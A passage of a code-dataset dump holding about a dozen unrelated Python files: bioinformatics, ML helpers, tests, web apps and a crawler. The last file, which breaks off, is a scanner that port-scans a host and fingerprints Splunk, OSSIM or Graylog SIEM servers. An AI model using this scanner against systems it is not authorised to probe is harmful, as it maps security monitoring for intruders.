($0~/^>/) {if (f) {printf \"\\n\"; counter++}; print \">contig_\"counter; f=1} else printf $0}END{printf \"\\n\"}' > ${output}\n    myoutput2 = 'assembly/contigs_trinity.fasta'\n    num_contigs = hp.fastajoinlines(myoutput, myoutput2, 'contig')\n\n    # compute simple distribution\n    # cat assembly/contigs_trinity.fasta | paste - - | awk '{print length($2)}' | sort -nr | ${d}/scripts/tablecount | awk -v tot=${num_contigs} 'BEGIN{x=0}{x+=$2; print $1\"\\t\"$2\"\\t\"x\"/\"tot\"\\t\"int(100*x/tot)\"%\"}' > assembly/contigs.distrib.txt\n    ahp.computedistrib(myoutput2, 'assembly/contigs.distrib.txt')\n\n    if not int(args.noclean):\n        cmd = 'rm -rf assembly_trinity'\n        hp.run_cmd(cmd, args.verbose, 0)\n\n    hp.echostep(args.step, start=0)\n\n    # return the name of assembly file\n    return myoutput2\n\n# -------------------------------------\n\ndef remap(args, contigs):\n    \"\"\"map contigs back onto assembly\"\"\"\n\n    
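# This step shells out to bowtie2 and samtools (see the commands below), so\n    # both tools are assumed to be available on PATH.\n    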
hp.echostep('remap')\n\n hp.mkdirp('assembly/ref_remap')\n\n refbowtie=\"assembly/ref_remap/ref\"\n\n cmd = 'bowtie2-build {} {}'.format(contigs, refbowtie)\n hp.run_cmd(cmd, args.verbose, 0)\n\n if (args.single):\n cmd = 'bowtie2 -p 4 -x {} -U {} -S {}'.format(refbowtie, args.mate1, 'assembly/reads2contigs.sam')\n else:\n cmd = 'bowtie2 -p 4 -x {} -1 {} -2 {} -S {}'.format(refbowtie, args.mate1, args.mate2, 'assembly/reads2contigs.sam')\n hp.run_cmd(cmd, args.verbose, 0)\n\n # convert to bam\n ## samtools version compatibility: need .bam extension\n cmd = 'samtools view -bS assembly/reads2contigs.sam | samtools sort -o assembly/reads2contigs.bam'\n hp.run_cmd(cmd, args.verbose, 0)\n\n cmd = 'samtools index assembly/reads2contigs.bam'\n hp.run_cmd(cmd, args.verbose, 0)\n\n cmd = 'rm assembly/reads2contigs.sam'\n hp.run_cmd(cmd, args.verbose, 0)\n\n # BAM index stats\n cmd = 'samtools idxstats assembly/reads2contigs.bam > assembly/reads2contigs.stats.txt'\n hp.run_cmd(cmd, args.verbose, 0)\n\n # mpileup\n cmd = 'samtools mpileup -A -B -d 100000 -L 100000 -f assembly/contigs_trinity.fasta assembly/reads2contigs.bam > assembly/reads2contigs.pileup'\n hp.run_cmd(cmd, args.verbose, 0)\n\n # format pileup file - i.e., add zeros to uncovered positions\n ahp.formatpileup('assembly/reads2contigs.pileup', 'assembly/reads2contigs.stats.txt', 'assembly/reads2contigs.format.pileup', 'assembly/reads2contigs.entropy')\n\n if not int(args.noclean):\n cmd = 'rm -r assembly/ref_remap'\n hp.run_cmd(cmd, args.verbose, 0)\n cmd = 'rm assembly/reads2contigs.pileup'\n hp.run_cmd(cmd, args.verbose, 0)\n\n hp.echostep('remap', start=0)\n\n# -------------------------------------\n\ndef main():\n \"\"\"Main function\"\"\"\n\n # get arguments\n args = get_arg()\n # assembly\n contigs = assembly(args)\n # remap\n remap(args, contigs)\n\n# -------------------------------------\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"scripts/assembly.py","file_name":"assembly.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"504518525","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport tensorflow as tf\n\nif tf.__version__ >= \"2.0.0\":\n import tensorflow.compat.v1 as tf\n\n\ndef dnn(inputs,\n hidden_units,\n hidden_activation=tf.nn.relu,\n output_activation=tf.nn.sigmoid,\n hidden_dropout=None,\n initializer=None):\n\n x = inputs\n for units in hidden_units:\n x = tf.layers.dense(x,\n units,\n activation=hidden_activation,\n kernel_initializer=initializer)\n\n if hidden_dropout is not None:\n x = tf.layers.dropout(x, rate=hidden_dropout)\n\n outputs = tf.layers.dense(x, 1, kernel_initializer=initializer)\n\n if output_activation is not None:\n outputs = output_activation(outputs)\n return outputs\n","sub_path":"deep_recommenders/estimator/models/feature_interaction/dnn.py","file_name":"dnn.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"609419891","text":"\"\"\"\nThe main idea is to count all the occurring characters in a string. \nIf you have a string like aba, then the result should be {'a': 2, 'b': 1}.\n\nWhat if the string is empty? 
Then the result should be empty object literal, {}.\n\"\"\"\n\n\ndef count(string):\n letter_counter = {}\n for letter in string:\n letter_counter[letter] = letter_counter.get(letter, 0) + 1\n return letter_counter\n","sub_path":"count_characters_in_your_string/count_characters_in_your_string.py","file_name":"count_characters_in_your_string.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"457703536","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Copyright (c) 2002-2016 \"Neo Technology,\"\n# Network Engine for Objects in Lund AB [http://neotechnology.com]\n#\n# This file is part of Neo4j.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom collections import deque\nfrom json import JSONDecoder\n\nfrom boltkit.client import CLIENT, SERVER, MAX_BOLT_VERSION, Structure\n\n\nclass Item(object):\n pass\n\n\nclass Line(Item):\n\n def __init__(self, protocol_version, line_no, peer, message):\n self.protocol_version = protocol_version\n self.line_no = line_no\n self.peer = peer\n self.message = message\n\n\nclass ExitCommand(Item):\n\n pass\n\n\nclass Script(object):\n\n def __init__(self, file_name=None):\n self.bolt_version = 1\n self.auto = []\n self.lines = deque()\n if file_name:\n self.append(file_name)\n\n def __nonzero__(self):\n return bool(self.lines)\n\n def __bool__(self):\n return bool(self.lines)\n\n def __len__(self):\n return len(self.lines)\n\n def parse_message(self, message):\n tag, _, data = message.partition(\" \")\n v = self.bolt_version\n if tag in CLIENT[v]:\n parsed_tag = CLIENT[v][tag]\n elif tag in SERVER[v]:\n parsed_tag = SERVER[v][tag]\n else:\n raise ValueError(\"Unknown message type %s\" % tag)\n decoder = JSONDecoder()\n parsed = []\n while data:\n data = data.lstrip()\n try:\n decoded, end = decoder.raw_decode(data)\n except ValueError:\n break\n else:\n parsed.append(decoded)\n data = data[end:]\n return Structure(parsed_tag, *parsed)\n\n def parse_command(self, message):\n tag, _, data = message.partition(\" \")\n if tag == \"\":\n return ExitCommand()\n else:\n raise ValueError(\"Unknown command %s\" % tag)\n\n def parse_lines(self, lines):\n mode = \"C\"\n for line_no, line in enumerate(lines, start=1):\n line = line.rstrip()\n if line == \"\" or line.startswith(\"//\"):\n pass\n elif len(line) >= 2 and line[1] == \":\":\n mode = line[0].upper()\n yield line_no, mode, line[2:].lstrip()\n elif mode is not None:\n yield line_no, mode, line.lstrip()\n\n def append(self, file_name):\n lines = self.lines\n with open(file_name) as f:\n for line_no, mode, line in self.parse_lines(f):\n if mode == \"!\":\n command, _, rest = line.partition(\" \")\n if command == \"AUTO\":\n self.auto.append(self.parse_message(rest))\n if command == \"BOLT\":\n self.bolt_version = int(rest)\n if self.bolt_version < 0 or self.bolt_version > MAX_BOLT_VERSION or CLIENT[self.bolt_version] is None:\n raise RuntimeError(\"Protocol version %r in script %r is not available \"\n \"in 
this version of BoltKit\" % (self.bolt_version, file_name))\n elif mode in \"CS\":\n if line.startswith(\"<\"):\n lines.append(Line(self.bolt_version, line_no, mode, self.parse_command(line)))\n else:\n lines.append(Line(self.bolt_version, line_no, mode, self.parse_message(line)))\n\n def match_auto_request(self, request):\n for message in self.auto:\n if request.tag == message.tag:\n return True\n elif request == message:\n return True\n return False\n\n def match_request(self, request):\n if not self.lines:\n return 0\n line = self.lines[0]\n if line.peer != \"C\":\n return 0\n if match(line.message, request):\n self.lines.popleft()\n return 1\n else:\n return 0\n\n def match_responses(self):\n responses = []\n while self.lines and self.lines[0].peer == \"S\":\n line = self.lines.popleft()\n if isinstance(line, Line):\n responses.append(line.message)\n elif isinstance(line, ExitCommand):\n pass\n else:\n raise RuntimeError(\"Unexpected response %r\" % line)\n return responses\n\n\ndef match(expected, actual):\n return expected == actual\n","sub_path":"boltkit/server/scripting.py","file_name":"scripting.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"238925071","text":"#!/usr/bin/env python3\n\n# https://jakevdp.github.io/PythonDataScienceHandbook/05.11-k-centers.html\n\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nfrom scipy.spatial import distance\nfrom math import floor\n\nclass MyExpectMax:\n def __init__(self, data, n_clusters, random_state=11, max_iters=100, cluster_std=1.0, tol=0.1):\n self.data = data\n self.n_clusters = n_clusters\n self.random_state = random_state\n self.max_iters = max_iters\n self.hidden_values = np.zeros((len(data), n_clusters))\n self.prev_centers = np.zeros((n_clusters, data.shape[1]))\n self.cluster_std = cluster_std\n self.cov = np.identity(data.shape[1]) * cluster_std\n self.tol = tol\n self.iters = 0\n\n def run(self):\n self.__choose_random_centers()\n while self.__total_distance(self.centers, self.prev_centers) > self.tol and self.iters < self.max_iters:\n self.__calc_hidden_values()\n self.__find_new_centers()\n self.iters += 1\n # Harden the clusters before returning.\n cluster_labels = np.array([np.argmax(row) for row in self.hidden_values])\n return cluster_labels, self.centers, self.iters\n\n def __choose_random_centers(self):\n np.random.seed(self.random_state)\n indices = np.random.choice(\n self.data.shape[0],\n size=self.n_clusters,\n replace=False\n )\n self.centers = self.data[indices]\n\n def __calc_hidden_values(self):\n distributions = np.array(\n [multivariate_normal(center, self.cov) for center in self.centers]\n )\n for i, point in enumerate(self.data):\n for j, distribution in enumerate(distributions):\n self.hidden_values[i, j] = distribution.pdf(point)\n z_sum = np.sum(self.hidden_values[i]) + 1e-300\n for j in range(self.n_clusters):\n self.hidden_values[i, j] = self.hidden_values[i, j] / z_sum\n\n def __find_new_centers(self):\n self.prev_centers = np.copy(self.centers)\n for i in range(self.n_clusters):\n self.centers[i] = np.average(self.data, axis=0, weights=self.hidden_values[:, i])\n\n def __total_distance(self, points1, points2):\n total = 0\n for i in range(points1.shape[0]):\n total += distance.euclidean(points1[i], points2[i])\n return 
total\n","sub_path":"a3/submit/classes/my_expect_max.py","file_name":"my_expect_max.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"462252213","text":"#Returns True if n is a prime number, False otherwise.\ndef isPrime(n):\n    if n<2:\n        return False\n    for j in range(2,n):\n        if n%j==0:\n            return False\n\n    return True\n\n#Run only when executed as the main module\nif(__name__==\"__main__\"):\n    #Get input from the user as an integer\n    user_input = int(input(\"Enter the number to find the number of prime numbers:\"))\n    for i in range(1,user_input):\n        if isPrime(i):\n            print(i)\n","sub_path":"python/PrimeNumber.py","file_name":"PrimeNumber.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"628081839","text":"from collections import namedtuple\nimport json\nfrom urllib.parse import urlparse\nfrom django.conf import settings\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import Http404, QueryDict\nfrom django.test import TestCase, RequestFactory\n\nfrom utils.paginate import paginate\nfrom utils.uploads import split_extension, file_allowed, get_unique_upload_path\nfrom utils.views import json_render, json_redirect\n\n\nclass FakeModel:\n    class Meta:\n        app_label = 'testing'\n        model_name = 'fake_model'\n\n    def __init__(self):\n        self._meta = FakeModel.Meta()\n\n\nclass Uploads(TestCase):\n    def test_split_extension(self):\n        \"\"\"\n        Test that split_extension method works properly.\n        \"\"\"\n        scenarios = {\n            'awesome_filename.jpg': ['awesome_filename', 'jpg'],\n            'path/awesome_filename.GIF': ['path/awesome_filename', 'gif'],\n            'path/path/awesome_filename': ['path/path/awesome_filename', ''],\n        }\n        for input, output in scenarios.items():\n            name, ext = split_extension(input)\n            self.assertEqual(name, output[0])\n            self.assertEqual(ext, output[1])\n\n    def test_file_allowed(self):\n        \"\"\"\n        Test that file_allowed method works properly on all ALLOWED_EXTENSIONS\n        and does not allow other file types.\n        \"\"\"\n        scenarios = {\n            'path/awesome_filename.exe': False,\n            'path/awesome_filename.dll': False,\n            'path/awesome_filename.sh': False,\n            'path/awesome_filename': False,\n        }\n        for ext in settings.ALLOWED_EXTENSIONS:\n            scenarios['path/awesome_filename.{}'.format(ext)] = True\n        for input, output in scenarios.items():\n            result = file_allowed(input)\n            self.assertEqual(result, output)\n\n    def test_get_unique_upload_path(self):\n        \"\"\"\n        Test that get_unique_upload_path works properly.\n        \"\"\"\n        instance = FakeModel()\n        filename = get_unique_upload_path(instance, 'image.jpg')\n        self.assertEqual(len(filename), 55)\n        self.assertEqual(filename[:19], 'testing/fake_model/')\n        self.assertEqual(filename[-4:], '.jpg')\n\n\nclass Views(TestCase):\n    def test_json_render(self):\n        \"\"\"\n        Test that the json_render view works properly.\n        \"\"\"\n        self.factory = RequestFactory()\n        # raises an error if not an ajax request\n        request = self.factory.get('/dummy')\n        with self.assertRaises(PermissionDenied):\n            response = json_render(request, 'base.html', {})\n        # works fine if it is an ajax request\n        request = self.factory.get(\n            '/dummy', HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n        response = json_render(request, 'base.html', {})\n        result = json.loads(response.content.decode(\"utf-8\"))\n        self.assertEqual(response.status_code, 200)\n        self.assertTrue('html' in result)\n\n    def test_json_redirect(self):\n        \"\"\"\n        Test that the json_redirect view works properly.\n        \"\"\"\n        self.factory = RequestFactory()\n        # raises an error if not an ajax request\n        request = self.factory.get('/dummy')\n        with self.assertRaises(PermissionDenied):\n            response = json_redirect(request, '/dummy2')\n        # works fine if it is an ajax request\n        request = self.factory.get(\n            '/dummy', HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n        response = json_redirect(request, '/dummy2')\n        result = json.loads(response.content.decode(\"utf-8\"))\n        self.assertEqual(response.status_code, 200)\n        self.assertTrue('url' in result)\n\n\nclass Paginate(TestCase):\n    def get_article_set(self):\n        \"\"\"\n        Return a list of article titles.\n        \"\"\"\n        # Our paginator does not care if the instance is a model or not, so\n        # create a dummy class here to use instead of an actual model.\n        Article = namedtuple(\"Article\", field_names=('title'))\n\n        output = []\n        for x in range(1, 10):\n            # list += tuple extends element-wise, so this appends the bare\n            # title string, which is what the assertions below compare against\n            output += Article(title='Test%s' % x)\n        return output\n\n    def get_scenarios(self):\n        return (\n            # ( params, page, prev_params, next_params, results )\n\n            # page 1 (default)\n            ( '', 1, None, 'p=2', ['Test1', 'Test2', 'Test3']),\n            # page 1 is default for non-numeric\n            ( 'p=invalid', 1, None, 'p=2', ['Test1', 'Test2', 'Test3']),\n            # page 2 has next and previous\n            ( 'p=2', 2, 'p=1', 'p=3', ['Test4', 'Test5', 'Test6']),\n            # page 3 does not have next\n            ( 'p=3', 3, 'p=2', None, ['Test7', 'Test8', 'Test9']),\n            # additional query params\n            ('a=1&b=2&p=2', 2, 'a=1&b=2&p=1', 'a=1&b=2&p=3',\n             ['Test4', 'Test5', 'Test6']),\n        )\n\n    def test_paginate(self):\n        \"\"\"\n        Test that our custom paginate() method works properly.\n        \"\"\"\n        factory = RequestFactory()\n        articles = self.get_article_set()\n        url = '/dummy/page'\n\n        for test in self.get_scenarios():\n            params, page, prev_params, next_params, results = test\n            request = factory.get(url + '?' 
+ QueryDict(params).urlencode())\n paginator, queryset = paginate(request, articles, 3)\n self.assertEqual(paginator.this_page.number, page)\n self.assertEqual(queryset, results)\n if next_params:\n next_dict = QueryDict(next_params)\n pag_dict = QueryDict(urlparse(paginator.next_url).query)\n self.assertEqual(next_dict, pag_dict)\n if prev_params:\n prev_dict = QueryDict(prev_params)\n pag_dict = QueryDict(urlparse(paginator.previous_url).query)\n self.assertEqual(prev_dict, pag_dict)\n\n # there is no page 4 so it throws an error\n request = factory.get('/dummy?p=4')\n with self.assertRaises(Http404):\n paginate(request, articles, 3)\n\n # allow empty works\n request = factory.get('/dummy')\n paginator, queryset = paginate(request, [], 3, allow_empty=True)\n self.assertEqual(queryset, [])\n\n # don't allow empty\n request = factory.get('/dummy')\n with self.assertRaises(Http404):\n paginate(request, [], 3, allow_empty=False)","sub_path":"utils/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"434420969","text":"from flask import Blueprint, jsonify, request\nimport models\nfrom playhouse.shortcuts import model_to_dict\nfrom peewee import IntegrityError\n\nvisitor = Blueprint('whispering_oaks', 'visitor')\n\n\n@visitor.route('/', methods=['GET'])\ndef get_all_visitors():\n try:\n db_whispering_oaks = models.Visitor.select()\n visitors = []\n\n for visitor in db_whispering_oaks:\n visitors.append(model_to_dict(visitor))\n\n return jsonify(data=visitors, status={'code': 200, 'message': 'Success'})\n\n except models.DoesNotExist:\n return jsonify(data={}, status={'code': 401, 'message': 'Error getting the resource'})\n\n\n@visitor.route('/', methods=['POST'])\ndef create_visitor():\n payload = request.get_json()\n\n try:\n visitor = models.Visitor.create(\n name=payload['name'], number=payload['number'], email=payload['email'], date=payload['date'], message=payload['message'])\n\n return jsonify(data=model_to_dict(visitor), status={'code': 201, 'message': 'Success'})\n\n except IntegrityError:\n print('Invalid Schema was sent')\n\n return jsonify(data={}, status={'code': 401, 'message': 'Invalid visitor schema'})\n","sub_path":"resources/whispering_oaks.py","file_name":"whispering_oaks.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"339362014","text":"import random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import MLPClassifier\nimport pandas as pd\nimport sys\nfrom utils.encode_decode import pickle_model\nfrom bank_marketing.common_utils.train_utils import Encoder\n\n\ndef train(msg):\n random.seed(0)\n training_data_uri = msg.payload.get(\"$ref\", \"./data/bank_marketing-prepped.csv\")\n save_model_as = msg.payload.get(\"model_name\")\n data = pd.read_csv(training_data_uri)\n feature_names = list(data.columns[:-1])\n\n # Separate outcome\n y = data[\"deposit\"]\n X = data.drop(\"deposit\", axis=1)\n\n # apply encoder data\n scaler = Encoder(X)\n scaler.fit(X)\n\n X_onehot = scaler.transform(X)\n\n # split test and training\n X_train, X_test, y_train, y_test = train_test_split(\n X_onehot, y, test_size=0.3, random_state=4\n )\n # start model training\n mlp = MLPClassifier()\n mlp.fit(X_train, y_train)\n mlp.score(X_test, y_test)\n mlp_acc = mlp.score(X_test, y_test)\n model_binary = f\"models/{save_model_as}.pkl\"\n 
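# Persist the trained classifier together with its fitted encoder so that\n    # inference code can re-apply the same one-hot transform before predicting.\n    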
pickle_model(mlp, scaler, \"MLP\", mlp_acc, \"Basic MLP classifier\", model_binary)\n print(mlp_acc)\n return f\"model: {model_binary}\"\n\n","sub_path":"bank_marketing/multiLayerPerceptron/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"210063010","text":"# -*- coding: utf-8 -*-\nimport re\nimport urllib\nfrom urlparse import urljoin\nimport scrapy\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.selector import Selector\nfrom hccc.items import Councilor\nfrom crawler_lib import parse\nfrom crawler_lib import misc\n\n\nclass Spider(scrapy.Spider):\n name = \"councilors\"\n base_url = \"http://www.hsinchu-cc.gov.tw\"\n allowed_domains = [\"www.hsinchu-cc.gov.tw\"]\n start_urls = [\"http://www.hsinchu-cc.gov.tw/content/councilor.htm\", ]\n download_delay = 0.5\n\n def parse(self, response):\n sel = Selector(response)\n nodes = sel.xpath(u'//a')\n base_url = self.base_url + '/content/'\n for node in nodes:\n url = base_url + node.xpath('@href').extract()[0]\n yield Request(url, callback=self.parse_profile)\n\n def parse_profile(self, response):\n sel = Selector(response)\n main_node = sel.xpath('/html/body/table/tbody/tr[1]/td/table[2]/tbody')\n basic_info_node = main_node.xpath('tr[1]/td[2]/p')\n sub_table_node = main_node.xpath('.//tbody')\n base_url = self.base_url + '/content/'\n\n item = Councilor()\n item['contact_details'] = []\n item['links'] = [{'url': response.url, 'note': u'議會個人官網'}]\n item['image'] = base_url + parse.get_extracted(sel.xpath(u'//div/img/@src'))\n\n key_map = {\n u'性別': 'gender',\n u'黨籍': 'party',\n u'選區': 'constituency',\n }\n\n for i, line in enumerate(basic_info_node.xpath('.//text()').extract()):\n line = line.strip()\n if i == 0:\n item['name'] = line\n continue\n\n cols = line.split(u':')\n k_chinese = parse.remove_whitespaces(cols[0])\n value = cols[1]\n\n k_eng = key_map.get(k_chinese)\n if k_eng:\n item[k_eng] = value\n\n for tr in sub_table_node.xpath('tr'):\n cols = tr.xpath('td')\n left = parse.remove_whitespaces(parse.get_extracted(cols[0].xpath('text()')).strip())\n right = parse.get_inner_text(cols[1])\n\n if left == u'政見':\n item['platform'] = parse.get_inner_text_lines(cols[1])\n if left == u'服務處地址':\n misc.append_contact(item, 'address', left, right)\n if left == u'電子郵件信箱':\n misc.append_contact(item, 'email', left, right)\n if u'電話' in left:\n misc.append_contact(item, 'voice', left, right)\n if u'網址' in left:\n item['links'].append({'url': right, 'note': left})\n\n return item\n\n","sub_path":"crawler/hccc/hccc/spiders/councilors.py","file_name":"councilors.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"70282635","text":"#! 
/data/data/com.termux/files/usr/bin/python3\n\nfrom database import Database\nfrom exercise import Exercise\nimport os\nimport readline\nimport time\nfrom utilities import *\n\ndef log_exercise(db,log_dir):\n write_or_append = \"w\"\n if len(db) == 0:\n print(\"No exercises in database.\")\n return\n log_msg = \"Enter index corresponding to the exercise: \"\n list_items(db)\n lift_index = get_number(log_msg,int)\n if lift_index < 0 or lift_index >= len(db):\n print(\"Invalid Index\")\n return \n weight = get_number(\"Enter the weight lifted: \",float)\n sets = get_number(\"Enter the number of sets: \", int)\n if not isinstance(sets,int):\n print(\"Not a number.\")\n return\n\n reps = []\n for i in range(sets):\n reps.append(get_number(\"Reps in set %d: \" % (i+1),int))\n reps_string = \"\"\n for rep_set in reps:\n reps_string += str(rep_set) + \",\"\n reps_string = reps_string[:-1]\n\n log_path = \"%s%d_%.2d_%.2d_%s\" % (log_dir,time.localtime()[0],time.localtime()[1],time.localtime()[2],time.ctime().split(\" \")[0] + \"_exercise_log.txt\")\n\n if path_exists(log_path):\n write_or_append = \"a\"\n\n with open(log_path,write_or_append) as f:\n f.write(repr(db[lift_index]) + \"\\t\" + str(weight) + \"\\t\" + reps_string + \"\\n\")\n\ndef create_exercise(db):\n list_items(db)\n name = get_string(\"Enter the name of the exercise: \")\n new_exercise = Exercise(name)\n db.add(new_exercise)\n\ndef get_log_path(log_dir):\n return \"%s%d_%.2d_%.2d_%s\" % (log_dir,time.localtime()[0],time.localtime()[1],time.localtime()[2],time.ctime().split(\" \")[0] + \"_exercise_log.txt\")\n\ndef output(log_line):\n name, weight, reps_per_set = log_line.split(\"\\t\")\n set_count = len(reps_per_set.split(\",\"))\n output_string = str(set_count) + \" sets of \" + reps_per_set.strip() + \" reps of \" + name + \" at \" + weight + \" lbs\\n\"\n return output_string\n\ndef view_stats(log_dir):\n current_path = get_log_path(log_dir)\n if path_exists(current_path):\n with open(current_path,\"r\") as f:\n for line in f:\n print(output(line))\n else:\n print(\"\\nPath does not exist.\")\n\ndef get_log_str(log_dir: str, path: str) -> str:\n string = \"\"\n log_path = get_log_path(log_dir)\n file_list = os.listdir(log_dir)\n with open(path, \"r\") as f:\n string += \"\\nLog from %s :\\n\" % path\n for line in f:\n string += output(line)\n return string\n\n## Show the previous two workouts if they exist\ndef show_previous(log_dir):\n log_path = get_log_path(log_dir)\n file_list = os.listdir(log_dir)\n if len(file_list) > 0:\n if log_dir+file_list[-1] != log_path:\n file_index = -1\n elif log_dir+file_list[-1] == log_path and len(file_list) > 1:\n file_index = -2\n if len(file_list) > 2:\n print(get_log_str(log_dir, log_dir + file_list[file_index - 1]))\n print(get_log_str(log_dir, log_dir + file_list[file_index]))\n with open(log_dir+file_list[file_index], \"r\") as f:\n print(\"\\nLog from \" + file_list[file_index] + \":\")\n for line in f:\n output(line)\ndef show_exercises(db):\n for item in db:\n print(item)\n\nif os.path.isfile(\"DEBUG\"):\n database_dir = \"./.lifts\"\n log_dir = \"./exercise_logs/\"\nelse:\n database_dir = \"/data/data/com.termux/files/home/.lifts/\"\n log_dir = \"/data/data/com.termux/files/home/exercise_logs/\"\n\ndatabase = Database(dirpath=database_dir,filename=\"lifts.dat\",fieldname=\"name\")\n\nstart_msg = \"\\nEnter to exit.\\n\\n1. Add exercise to log\\n2. Create new exercise in database\\n3. View Stats\\n4. Remove Exercise from Database \\n5. See previous stats\\n6. 
View Exercise Catalog\\n: \"\n\nuser_input = get_number(start_msg,int)\n\nwhile user_input != 'q':\n if user_input == 1:\n print(\"Add new exercise..\")\n log_exercise(database,log_dir)\n elif user_input == 2:\n print(\"Put new exercise in database.\")\n create_exercise(database)\n elif user_input == 3:\n view_stats(log_dir)\n elif user_input == 4:\n print(\"Removing exercise from database.\")\n remove_database_item(database)\n elif user_input == 5:\n show_previous(log_dir)\n elif user_input == 6:\n show_exercises(database)\n user_input = get_number(start_msg,int)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"292086302","text":"#!/usr/bin/env python3\n\n# Nmap Scanning Module\n\n# %%%%%%%%%%% Libraries %%%%%%%%%%%#\n\nfrom colorama import Fore, Back, Style\nimport logging\nimport nmap\nimport requests\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# %%%%%%%%%%% Constants %%%%%%%%%%%#\n\nSEPARATOR = \"[*] {0} [*]\".format('=' * 110)\nSPLUNK_TCP_PORT = 8089\nOSSIM_TCP_PORT = 443\nGRAYLOG_TCP_PORT = 9000\n\n# %%%%%%%%%%% Functions %%%%%%%%%%%#\n\ndef input_ip():\n\n\tsiemip = input(\"[!] Enter IP address of the SIEM: \")\n\treturn siemip\n\ndef scan_host(ip):\n\n\tsiemdetected = \"None\"\n\tsiemip = ip\n\n\ttry:\n\t\tnm = nmap.PortScanner()\n\t\tnm.scan(hosts = siemip, arguments = '-sT -T4 -p 8089,443,9000')\n\n\t\tif (nm[siemip]['tcp'][SPLUNK_TCP_PORT]['state'] == 'open' or\n\t\t\t\tnm[siemip]['tcp'][OSSIM_TCP_PORT]['state'] == 'open' or\n\t\t\t\tnm[siemip]['tcp'][GRAYLOG_TCP_PORT]['state'] == 'open'):\n\n\t\t\tprint('[!] IP Address: %s' % ip)\n\t\t\tprint('[!] Hostname: %s' % nm[siemip].hostname())\n\t\t\tprint('[!] State: %s' % nm[siemip].state())\n\t\t\tprint(SEPARATOR)\n\n\t\t\tfor proto in nm[siemip].all_protocols():\n\t\t\t\tlport = nm[siemip][proto].keys()\n\n\t\t\t\tfor port in lport:\n\t\t\t\t\tif nm[siemip][proto][port]['state'] == 'open':\n\t\t\t\t\t\tprint(\"[!] Port: %s State: %s\" % (port, nm[siemip][proto][port]['state']))\n\n\t\t\t\t\t\tif nm[siemip]['tcp'][SPLUNK_TCP_PORT]['state'] == 'open':\n\t\t\t\t\t\t\turl = \"https://\" + siemip + \":8089\"\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tresponse = requests.get(url, verify = False)\n\t\t\t\t\t\t\t\tif \"splunkd\" in response.text:\n\t\t\t\t\t\t\t\t\tsiemdetected = \"Splunk\"\n\n\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\tlogging.error(e, exc_info = True)\n\n\t\t\t\t\t\telif nm[siemip]['tcp'][GRAYLOG_TCP_PORT]['state'] == 'open':\n\t\t\t\t\t\t\turl = \"http://\" + siemip + \":9000\"\n\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tresponse = requests.get(url)\n\t\t\t\t\t\t\t\tif \"Graylog Web Interface\" in response.text:\n\t\t\t\t\t\t\t\t\tsiemdetected = \"Graylog\"\n\n\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\tlogging.error(e, exc_info = True)\n\n\t\t\t\t\t\telif nm[siemip]['tcp'][OSSIM_TCP_PORT]['state'] == 'open':\n\t\t\t\t\t\t\turl = \"https://\" + siemip + \"/ossim/session/login.php\"\n\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tresponse = requests.get(url, verify = False)\n\t\t\t\t\t\t\t\tif \"AlienVault OSSIM\" in response.text:\n\t\t\t\t\t\t\t\t\tsiemdetected = \"OSSIM\"\n\n\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\tlogging.error(e, exc_info = True)\n\n\texcept Exception as e:\n\t\tlogging.error(e, exc_info = True)\n\n\tif siemdetected != \"None\":\n\t\tprint(SEPARATOR)\n\t\tprint(\"[!] 
